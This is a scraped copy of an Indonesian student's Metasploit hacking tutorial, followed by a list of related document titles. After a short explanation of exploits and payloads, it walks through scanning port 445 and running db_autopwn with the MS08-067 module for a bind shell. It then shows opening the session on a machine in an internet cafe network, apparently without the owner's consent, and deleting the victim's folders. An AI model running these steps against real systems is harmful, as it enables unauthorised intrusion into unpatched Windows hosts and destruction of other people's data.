Tutorial Metasploit

download Tutorial Metasploit

of 10

Transcript of Tutorial Metasploit

Computer Hacking Tutorial METASPLOIT

Nama : I Wayan Hery Purnayasa

Nim: 090010286

SEKOLAH TINGGI MANAJEMEN INFORMATIKA DAN TEKNIK KOMPUTER STIKOM BALI 2011

Pendahuluan

Kebutuhan akan teknologi Jaringan Komputer semakin meningkat. Selain sebagai media penyedia informasi, melalui Internet pula kegiatan komunitas komersial menjadi bagian terbesar, dan terpesat pertumbuhannya serta menembus berbagai batas negara. Bahkan melalui jaringan ini kegiatan pasar di dunia bisa diketahui selama 24 jam. Melalui dunia internet atau disebut juga cyberspace, apapun dapat dilakukan. Segi positif dari dunia maya ini tentu saja menambah trend perkembangan teknologi dunia dengan segala bentuk kreatifitas manusia. Namun dampak negatif pun tidak bisa dihindari.

PENGERTIAN METASPLOIT Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem. Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack yang merupakan metode penyerangan pada software yang belum di patch. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang. Exploit adalah software yang berfungsi untuk memanfaatkan kelemahan pada software korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban. Payload merupakan sebuah executable milik penyerang yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain. Terlepas dari penggunaan metasploit yang disalah gunakan untuk kejahatan, software ini juga membantu System Security untuk memperkuat pertahanan jaringannya dari ulah penyerang dari luar.

Tutorial Hacking menggunakan METASPLOITOk pertama-tama, kita harus download Metasploit Framework dulu. Saya menggunakan Metasploit versi 3.2, setelah diinstall kita buka Metasploit Framework GUI. Buka Console baru pada menu Window.metasploit juga bisa diakses melalui WEB nya.

Console akan tampil seperti berikut: Selanjutnya kita ketik perintah: Kemudian di ENTER 1. msf> load db_sqlite3 load db_sqlite3 -> memanggil driver SQLite3, bertujuan untuk menyimpan semua parameter2 yg diperlukan oleh Metasploit Framework lalu ketik lagi 2. msf> db_create db_create -> membuat database baru pada SQLite3. dan hasilnya akan muncul seperti dibawah !

setelah itu kita akan menscan port-port 445 yang terbuka pada jaringan komputer ditempat anda mencoba, saya mencobanya di sebuah warnet dengan satu jaringan . 3. Untuk mempercepat proses scanning ketik perintah berikut : msf> db_nmap -sS -PS445 -p445 -n -T Aggressive 192.168.1.18 db_nmap -sS -PS445 -p445 -n -T Aggressive ip target > untuk scanning port 445, disini scope port dipersempit untuk mempercepat proses scanning. jadi hanya port 445 saja yg dicari ket:192.168.1.18 itu adalah IP target (sebenarnya hasilnya panjang tapi saya potong)

Sesaat kemudian Nmap akan melakukan proses scanning, dan kemudian akan menampilkan hasilnya pada Console diatas.

4. Setelah prompt msf> muncul ketikkan : msf> db_autopwn -e -p -b -m ms08_067 db_autopwn -e -p -b -m ms08_067 > -e menandakan exploit, -p port-based matching, -b menggunakan bindshell payload, -m menggunakan module ms08_067

hasilnya:

5. Proses exploitasi dimulai, saya beruntung menemukan komputer target terbuka. ketik perintah berikut: msf> sessions l sessions -l > list sessions yg berpotensi dimasuki

6. Jika ada maka kita bisa mencoba masuk DOS Prompt menggunakan perintah session -i [SID], pada console komputer target yang saya gunakan adalah SID=16

msf> session -i 16 sessions -i [SID] > mencoba interact dg sessions yg aktif dan hasilnya DOS Prompt berhasil dimasuki !!dan kita sudah masuk ke komputer target

7. Kemudian saya mencoba untuk masuk ke direktori C ,syntaknya CD\ Dilanjutkan dengan masuk ke Documents and Settings\administrator\My Documents\Downloads

8. Kemudian saya mencoba untuk mendelete sebuah folder yang ada di dalam folder downloads yang ada di computer korban yaitu saya mendelete folder Compressed yang ada di computer korban mendelet.syntaxnya: del Compressed

9. Selanjutnya saya mencoba menghapus folder music dengan syntax:del music

10. Kemudian saya menghapus folder Programs syntaxnya juga sama yaitu del Programs

11. Saya mencoba untuk melihat isi dari direktiri atau folder administrator dengan syntak: dir administrator


PENGEMBANGAN SATUAN ACARA TUTORIAL · Produk tugas tutorial Kriteria penilaian tugas tutorial. PELATIHAN TUTOR TUTORIAL ... Format. PELATIHAN TUTOR TUTORIAL ONLINE Pusat Riset dan

PENGEMBANGAN SATUAN ACARA TUTORIAL · Produk tugas tutorial Kriteria penilaian tugas tutorial. PELATIHAN TUTOR TUTORIAL ... Format. PELATIHAN TUTOR TUTORIAL ONLINE Pusat Riset dan

Dya tutorial

Dya tutorial

tutorial VB

tutorial VB

Tutorial Php

Tutorial Php

TUTORIAL (Glaukoma)

TUTORIAL (Glaukoma)

Tutorial ca

Tutorial ca

Tutorial Moodle

Tutorial Moodle

Simulasi Penyerangan Phising Dengan MITM Dan Metasploit

Simulasi Penyerangan Phising Dengan MITM Dan Metasploit

tutorial Matlab_Ind.pdf

tutorial Matlab_Ind.pdf

Tutorial Eritoderma

Tutorial Eritoderma

tutorial efiling.pdf

tutorial efiling.pdf

laporan tutorial

laporan tutorial

tutorial database

tutorial database

Tutorial PPOB

Tutorial PPOB

Tutorial Pulmo2

Tutorial Pulmo2

presentasi Metasploit

presentasi Metasploit

Tutorial Ekg

Tutorial Ekg

Tutorial Hacking Dengan Metasploit

Tutorial Hacking Dengan Metasploit

Basic Metasploit

Basic Metasploit

tutorial 1

tutorial 1